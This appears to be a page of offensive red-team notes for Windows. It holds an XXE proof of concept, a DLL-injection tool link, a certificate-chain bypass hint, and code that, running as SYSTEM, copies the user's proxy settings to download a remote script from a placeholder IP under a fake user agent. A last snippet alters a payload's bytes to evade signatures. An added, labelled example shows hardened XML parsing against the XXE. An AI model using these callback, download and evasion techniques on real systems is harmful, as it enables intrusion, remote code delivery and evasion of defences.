Install-Package Costura.Fody
XMLDocument PoC:
<?xml version='1.0' ?><!DOCTYPE doc [<!ENTITY win SYSTEM 'http://127.0.0.1:8000/hi'>]><doc>&win;</doc>
This works on .NET Framework <= 4.0 if the XmlResolver was not explicitly set to null.
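Hardened parsing for the same document, as an added example that is not part of the original page: it loads the PoC above with the XmlResolver cleared (no outbound request is made, the entity expands to nothing) and then with DTD processing prohibited on an XmlReader (the DOCTYPE itself is rejected). The document string is the page's PoC; everything else is constructed here.

```powershell
# Added example: parsing untrusted XML in .NET without resolving external entities.
# The document below is the XXE PoC from this page, embedded as a constructed sample.
$untrusted = "<?xml version='1.0' ?><!DOCTYPE doc [<!ENTITY win SYSTEM 'http://127.0.0.1:8000/hi'>]><doc>&win;</doc>"

# 1) XmlDocument: clear the resolver before loading. On .NET Framework 4.5.2 and later the
#    default is already null; setting it explicitly makes the intent clear on every runtime.
$doc = New-Object System.Xml.XmlDocument
$doc.XmlResolver = $null
$doc.LoadXml($untrusted)
# With no resolver the external entity is not fetched and expands to an empty string.
"Resolver disabled, inner text: '$($doc.DocumentElement.InnerText)'"

# 2) XmlReader with DTD processing prohibited: the DOCTYPE is rejected outright, so neither
#    external entities nor internal entity expansion tricks reach the application.
$settings = New-Object System.Xml.XmlReaderSettings
$settings.DtdProcessing = [System.Xml.DtdProcessing]::Prohibit
$settings.XmlResolver = $null
$reader = [System.Xml.XmlReader]::Create((New-Object System.IO.StringReader($untrusted)), $settings)
try {
    $safeDoc = New-Object System.Xml.XmlDocument
    $safeDoc.Load($reader)   # throws XmlException because the document carries a DTD
    "Unexpected: document loaded"
} catch [System.Xml.XmlException] {
    "DTD rejected: $($_.Exception.Message)"
} finally {
    $reader.Dispose()
}
```

The second form is the one to prefer for untrusted input: it fails closed on any DTD rather than relying on the resolver being cleared on every code path.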
https://github.com/ChadSki/SharpNeedle
It will not verify through the chain, but if the program does not check the whole chain it works ;-)
$Assemblies = [AppDomain]::CurrentDomain.GetAssemblies()
$Assemblies | ForEach-Object {
    $_.Location
    $_.GetTypes() | ForEach-Object {
        $_ | Get-Member -Static | Where-Object { $_.TypeName.Equals('Microsoft.Win32.UnsafeNativeMethods') }
    } 2> $null
}
Sometimes we execute as SYSTEM and still need to use the box's proxy settings to call back to us. In this case we can resolve the current proxy settings from the logged-on user's hive (HKCU, reached through HKEY_USERS when running as SYSTEM) and copy them.
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem 'HKU:\'
ForEach ($key in $keys) {
    if ($key.Name -like "*S-1-5-21-*") {
        # Strip the leading "HKEY_USERS" so $start becomes "\S-1-5-21-..."
        $start = $key.Name.Substring(10)
        break
    }
}
$proxy = (Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
[System.Net.WebRequest]::DefaultWebProxy = New-Object System.Net.WebProxy("http://$proxy")
$wc = New-Object System.Net.WebClient
$wc.Headers.Add('User-Agent', "Legit User Agent")
$wc.DownloadString("http://<ip>/script.ps1")
$bytes = [System.IO.File]::ReadAllBytes("payload.exe")
$bytes[200] = 0xFF
[System.IO.File]::WriteAllBytes("payload.exe", $bytes)